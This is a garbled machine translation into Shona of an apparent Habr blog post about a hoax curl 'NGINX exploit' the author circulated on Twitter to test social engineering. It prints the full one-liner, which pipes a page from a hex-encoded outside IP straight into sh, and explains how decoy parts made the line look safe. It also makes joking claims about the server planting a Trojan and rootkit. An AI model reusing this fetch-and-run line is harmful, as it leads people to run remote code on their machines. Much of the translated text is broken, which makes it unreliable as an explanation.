Cherechedza. transl.:
TL; DR: Usashandise faira pipelining mu sh kana bash chero mamiriro ezvinhu. Iyi inzira huru yekutadza kutonga komputa yako.
Ini ndinoda kugovera newe nyaya pfupi nezve inosekesa PoC kushandiswa iyo yakagadzirwa muna Chivabvu 31st. Akaoneka nekukasira achipindura nhau kubva
Ndapedza kushanda panzira nyowani yekubiridzira mucurl, ndakatora iyo yekutanga tweet uye "ndakaburitsa PoC inoshanda" inosanganisira mutsara mumwe chete wekodhi uyo unofungidzirwa kuti unoshandisa njodzi yakawanikwa. Hongu, uku kwaive kusaziva zvachose. Ndakafunga kuti ndaizobva ndafumurwa, uye kuti zvakanaka ndaizowana akati wandei retweets (o zvakanaka).
Zvisinei, handina kukwanisa kufungidzira zvakazoitika. Mukurumbira wetitter yangu wakawedzera. Zvinoshamisa kuti panguva ino (15:00 Moscow nguva June 1) vanhu vashomanana vakaona kuti iyi inhema. Vanhu vazhinji vanoidzorerazve vasina kuitarisa zvachose (regai kungoyemura inoyevedza ASCII mifananidzo yainoburitsa).
Chingotarisai kunaka kwaro!
Nepo ese aya zvishwe uye mavara akanaka, zviri pachena kuti vanhu vaifanira kumhanya kodhi pamushini wavo kuti vazvione. Neraki, mabhurawuza anoshanda nenzira imwechete, uye akasanganiswa nenyaya yekuti ini ndaisada chaizvo kupinda mudambudziko remutemo, kodhi yakavigwa munzvimbo yangu saiti yaingoita echo mafoni pasina kuyedza kuisa kana kuita imwe kodhi yekuwedzera.
Digression diki:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Socio-electronic engineering (SEE) inopfuura phishing
Kuchengeteka uye kuzivana ndizvo zvaive chikamu chikuru chekuedza uku. Ndinofunga kuti ndivo vakaita kuti abudirire. Mutsara wekuraira wainyatso reva chengetedzo nekureva "127.0.0.1" (iyo inozivikanwa localhost). Localhost inoonekwa seyakachengeteka uye iyo data pairi haimbosiya komputa yako.
Kujairika yaive yechipiri kiyi ONA chikamu chekuyedza. Sezvo chinangwa chevateereri kunyanya chaive nevanhu vanoziva nheyo dzekuchengetedzwa kwekombiyuta, zvaive zvakakosha kugadzira kodhi kuitira kuti zvikamu zvayo zviite sezvinozivikanwa uye zvinozivikanwa (uye naizvozvo zvakachengeteka). Kukwereta zvinhu zvekare zvekushandisa pfungwa nekuzvibatanidza nenzira isina kujairika kwakaratidza kuve kwakabudirira zvikuru.
Pazasi pane kuongororwa kwakadzama kweiyo-liner. Zvese zviri pachirongwa ichi zvinopfeka cosmetic nature, uye hapana chinodiwa pakushanda kwayo chaiko.
Ndezvipi zvinoriumba zvinonyatsodiwa? Izvi -gsS
, -O 0x0238f06a
, |sh
uye web server pachayo. Iyo webhu server yanga isina chero mirairo yakaipa, asi yaingoshanda ASCII mifananidzo uchishandisa mirairo echo
mune script irimo index.html
. Kana mushandisi akapinda mutsetse ne |sh
pakati, index.html
akaremerwa uye akaurayiwa. Neraki, vachengeti vewebhu server vaive vasina vavariro dzakaipa.
-
../../../%00
- inomiririra kupfuura dhairekitori; -
ngx_stream_module.so
- nzira yekuenda kune isingaite NGINX module; -
/bin/sh%00<'protocol:TCP'
- isu tinofanirwa kutanga/bin/sh
pamushini wakanangwa uye tungamira zvinobuda kuTCP chiteshi; -
-O 0x0238f06a#PLToffset
- chinhu chakavanzika, chakawedzerwa#PLToffset
, kuita senge memory offset neimwe nzira iri muPLT; -
|sh;
- chimwe chikamu chakakosha. Taifanira kutungamira zvakabuda ku sh/bash kuitira kuti tiite kodhi inouya kubva kune inorwisa webhu server iri pa.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy umo netcat inoreva/dev/tcp/localhost
kuitira kuti zvinhu zvose zvionekwe zvakachengeteka zvakare. Muchokwadi, haaiti chinhu uye inosanganisirwa mumutsara werunako.
Izvi zvinopedzisa kudhindwa kweiyo-line script uye nhaurirano yezvikamu zve "socio-electronic engineering" (yakaoma kunzwisisa phishing).
Web Server Configuration uye Countermeasures
Sezvo ruzhinji rwevanyoreri vangu vari infosec / hackers, ndakasarudza kuita kuti sevha yewebhu isanyanya kupikisa kutaura kwe "kufarira" padivi pavo, kuitira kuti vakomana vave nechimwe chinhu chekuita (uye zvingave zvinonakidza gadzirira). Ini handisi kuzonyora zvipingaidzo zvese pano sezvo kuyedza kuchiri kuenderera, asi hezvino zvinhu zvishoma zvinoitwa neserver:
- Inonyatso tarisa kuedza kwekugovera pane mamwe masocial network uye inotsiva akasiyana ekuona zvigunwe kukurudzira mushandisi kudzvanya pane chinongedzo.
- Redirect Chrome/Mozilla/Safari/etc kuThugcrowd promotional video pane kuratidza shell script.
- Mawadhi e OBVIOUS zviratidzo zvekupindirwa/kubira zviri pachena, obva atanga kuendesa zvikumbiro kumaseva eNSA (ha!).
- Inoisa Trojan, pamwe neBIOS rootkit, pamakomputa ese ane vashandisi vanoshanyira mugadziri kubva kune akajairwa browser (kungotamba!).
Chikamu chiduku che antimers
Muchiitiko ichi, chinangwa changu chega chaive chekuziva zvimwe zveApache - kunyanya, iyo inotonhorera mitemo yekudzosera zvikumbiro - uye ndakafunga: nei?
NGINX Shandisa (Chaiyo!)
Nyorera kune
Source: www.habr.com